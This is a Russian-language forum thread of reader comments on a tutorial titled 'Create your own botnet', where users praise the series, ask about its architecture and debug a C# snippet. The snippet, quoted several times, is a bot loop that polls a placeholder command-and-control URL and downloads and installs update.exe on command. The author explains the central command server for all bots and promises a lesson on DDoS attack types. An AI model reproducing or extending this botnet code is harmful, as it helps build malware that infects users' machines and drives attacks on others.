Статья Создаем свой ботнет

SooLFaa

SooLFaa

Администратор
15.07.2016
857
1 416
Я считаю серьезный недостаток вообще что либо писать на Дельфи. Устаревший и мертвый язык.
 
z3RoTooL

z3RoTooL

Well-known member
28.02.2016
716
695
статья зашла ! :) ботнет - стильно, модно, молодёжно :))) давай дальше, ждём продолжение!
 
  • Нравится
Реакции: BaJIepraH
V

viktorcruce

Active member
19.12.2016
28
4
хотелось бы больше узнать про рефлексию . статья супер
 
SooLFaa

SooLFaa

Администратор
15.07.2016
857
1 416
Как скоро ждать продолжения?
Конкретно про Ботнет - думаю с периодичностью раз в неделю. Для того чтобы....
а) Народ не уставал, т.к. разработка ботнета - это не просто "use exploit -> set rhost 127.0.0.1 -> exploit", а требует от читателя серьезногно обдумывания и уложить в голове
б) Сам процесс разработки достаточно временнозатратный и написание статьи на эту тему забирает много ресурсов, поэтому неделю после статьи я "причесываю" и привожу в порядок код, для дальнейшего развития.
 
  • Нравится
Реакции: Ishikawa
S

SoulPaladin

Вот с этим не понял ругается постоянно. куда только не пихал..


А в программу добавим
Код (C):
private static string _url = @"URL/index.php"; (тут наша заглушка пока)
private const int interval = 10000; // 1000 seconds ~ 16 minutes
while (true)
{
Thread.Sleep(interval);
var command = _fileService.GetCommandByUrl(_url);

if (command.Equals("update"))
{
WebClient myWebClient = new WebClient();
myWebClient.DownloadFile(_url, "update.exe");
_fileService.RemoveFile();
_fileService.CopyFile("update.exe");
}
}
 

Вложения

ghostphisher

ghostphisher

гарант codeby
Gold Team
07.12.2016
2 556
3 399
по моему логично писать непосредственно бота на .net при условии что потенциально зараженные юзеры в 99% это пользователи винды, а благодаря .net библиотеке мы можем работать на одном уровне с самой win :)) При этом учитывая что админку тоже где то надо хостить то и серверную часть нам ни что не мешает написать на том же .net c# :) Благо стек технологий позволяет
Да логично все, слов нет =) Желание усидеть на 1-ой системе подталкивает выискивать варианты ;)
ПС Под win 7 какой набор посоветуете для кодинга (С и С#)?
 
T

TheUnity

Member
27.08.2016
10
0
Вот с этим не понял ругается постоянно. куда только не пихал..


А в программу добавим
Код (C):
private static string _url = @"URL/index.php"; (тут наша заглушка пока)
private const int interval = 10000; // 1000 seconds ~ 16 minutes
while (true)
{
Thread.Sleep(interval);
var command = _fileService.GetCommandByUrl(_url);

if (command.Equals("update"))
{
WebClient myWebClient = new WebClient();
myWebClient.DownloadFile(_url, "update.exe");
_fileService.RemoveFile();
_fileService.CopyFile("update.exe");
}
}
скобки закомментируй
 
T

TheUnity

Member
27.08.2016
10
0
Конкретно про Ботнет - думаю с периодичностью раз в неделю. Для того чтобы....
а) Народ не уставал, т.к. разработка ботнета - это не просто "use exploit -> set rhost 127.0.0.1 -> exploit", а требует от читателя серьезногно обдумывания и уложить в голове
б) Сам процесс разработки достаточно временнозатратный и написание статьи на эту тему забирает много ресурсов, поэтому неделю после статьи я "причесываю" и привожу в порядок код, для дальнейшего развития.
будет очень интересно. сам сейчас начинаю изучать c# и в голову пришла идея сделать бота для телеграма, чтобы управлять ботом
 
SooLFaa

SooLFaa

Администратор
15.07.2016
857
1 416
Вот с этим не понял ругается постоянно. куда только не пихал..


А в программу добавим
Код (C):
private static string _url = @"URL/index.php"; (тут наша заглушка пока)
private const int interval = 10000; // 1000 seconds ~ 16 minutes
while (true)
{
Thread.Sleep(interval);
var command = _fileService.GetCommandByUrl(_url);

if (command.Equals("update"))
{
WebClient myWebClient = new WebClient();
myWebClient.DownloadFile(_url, "update.exe");
_fileService.RemoveFile();
_fileService.CopyFile("update.exe");
}
}
Дождись второго урока. Я приведу в порядок код и выкачу релиз.
 
J

JuicyBrute

Да логично все, слов нет =) Желание усидеть на 1-ой системе подталкивает выискивать варианты ;)
ПС Под win 7 какой набор посоветуете для кодинга (С и С#)?
так все зависит от того ЧТО именно хотите разрабатывать. Можно и на python например бота написать под виндой ) А серверную сторону хоть на nodejs например ))) Времена нынче такие что ограничений практически нету )

К автору:
было бы клево если бы еще каких нибудь ссылочек накидали, где побольше почитать про ботнеты и ботов ))) Как раз неделя в ожидании новой части пройдет назаметно да еще и с пользой)))
 
  • Нравится
Реакции: in1rovert и BaJIepraH
SooLFaa

SooLFaa

Администратор
15.07.2016
857
1 416
уверен, что ошибка в незакомментированых "(тут наша заглушка пока)"
Ты абсолютно прав.
так все зависит от того ЧТО именно хотите разрабатывать. Можно и на python например бота написать под виндой ) А серверную сторону хоть на nodejs например ))) Времена нынче такие что ограничений практически нету )

К автору:
было бы клево если бы еще каких нибудь ссылочек накидали, где побольше почитать про ботнеты и ботов ))) Как раз неделя в ожидании новой части пройдет назаметно да еще и с пользой)))
Ой, да чесно говоря, я как то писал особо не обращаясь к источнику. Как будет работать ботнет это только полет фантазий. А вот типы DDOS атак мы рассмотрим в следующем уроке.
 
J

JuicyBrute

Ты абсолютно прав.

Ой, да чесно говоря, я как то писал особо не обращаясь к источнику. Как будет работать ботнет это только полет фантазий. А вот типы DDOS атак мы рассмотрим в следующем уроке.
В процессе попытки разобраться в твоей реализации вопросы возникли (вообще свою пилю, но чужой код всегда интересно смотреть на предмет перенять практики какие то и тд)
1) Собственно первый и самый животрепещущий, а что с архитектурой?) Просто вначале сказано что вроде как ТЗ обсудили переходим к архитектуре и все тишина, хотелось бы понять как будет устроена архитектура ботнета )))
2) Интерфейс IFileManager, какова цель его создания? Тем более что в листинге он нигде не мелькает какие абстрактные методы в нем есть тоже непонятно )))
3) Тоже на тему архитектуры и первого пункта ТЗ "Создать билд который по указанному пути будет брать команду для ботов" что означает брать команду для бота? Я думал команды (поведение) будут реализованы на уровне самого бота? Или я ошибаюсь?

В общем подзапутался :)
 
SooLFaa

SooLFaa

Администратор
15.07.2016
857
1 416
В процессе попытки разобраться в твоей реализации вопросы возникли (вообще свою пилю, но чужой код всегда интересно смотреть на предмет перенять практики какие то и тд)
1) Собственно первый и самый животрепещущий, а что с архитектурой?) Просто вначале сказано что вроде как ТЗ обсудили переходим к архитектуре и все тишина, хотелось бы понять как будет устроена архитектура ботнета )))
2) Интерфейс IFileManager, какова цель его создания? Тем более что в листинге он нигде не мелькает какие абстрактные методы в нем есть тоже непонятно )))
3) Тоже на тему архитектуры и первого пункта ТЗ "Создать билд который по указанному пути будет брать команду для ботов" что означает брать команду для бота? Я думал команды (поведение) будут реализованы на уровне самого бота? Или я ошибаюсь?

В общем подзапутался :)
Ну давай по порядочку
1) Архитектура сервисная. То есть для каждой бизнес логики мы используем свой сервис для которого создаем интерфейс и реализацию.
2) Интерфейс используется при объявлении сервиса в классе Program.cs следующим образом
private IFileManager _fileService = new FileManager();
3) Так и есть, но должен же быть единый командный центр откуда ты будешь говорить всем ботам, что делать. Для этого мы и сделали заглушку в начале урока и поместили скрипт на сервере он просто возвращает надпись update, которую читают боты. Спасибо за интересный вопрос.
 
  • Нравится
Реакции: JuicyBrute
J

JuicyBrute

Ну давай по порядочку
1) Архитектура сервисная. То есть для каждой бизнес логики мы используем свой сервис для которого создаем интерфейс и реализацию.
2) Интерфейс используется при объявлении сервиса в классе Program.cs следующим образом
private IFileManager _fileService = new FileManager();
3) Так и есть, но должен же быть единый командный центр откуда ты будешь говорить всем ботам, что делать. Для этого мы и сделали заглушку в начале урока и поместили скрипт на сервере он просто возвращает надпись update, которую читают боты. Спасибо за интересный вопрос.
1) Вначале именно так и подумал, потом на скрине с обфускатора (да и по тексту) нигде не увидел интерфейса IProcessManager и в листинге класса не указано что он реализует какие либо интерфейсы, а при этом по тексту указано что это новый сервис и поэтому немного смутило ))) Теперь понятно.
3) Все, дошло. Туплю я что-то к ночи :D

Кстати может действительно если есть возможность редактировать стартовый пост добавлять туда вопрос-ответ которые дальше задавали в самом теле треда и показались тебе интересными и раскрывающими некоторые нюансы?

Спасибо за ответы :)
 
SooLFaa

SooLFaa

Администратор
15.07.2016
857
1 416
1) Вначале именно так и подумал, потом на скрине с обфускатора (да и по тексту) нигде не увидел интерфейса IProcessManager и в листинге класса не указано что он реализует какие либо интерфейсы, а при этом по тексту указано что это новый сервис и поэтому немного смутило ))) Теперь понятно.
3) Все, дошло. Туплю я что-то к ночи :D

Кстати может действительно если есть возможность редактировать стартовый пост добавлять туда вопрос-ответ которые дальше задавали в самом теле треда и показались тебе интересными и раскрывающими некоторые нюансы?

Спасибо за ответы :)
К сожалению у меня такой возможности нет в этом разделе. :)
 
S

SoulPaladin

Дождись второго урока. Я приведу в порядок код и выкачу релиз.
Ошибка не в том что не закоментировано... а пишет что пространство имен не может напрямую включать в себя такие члены как поля или методы.
и второй на строке while(true) требуется определение типа или пространства имен
 
Мы в соцсетях: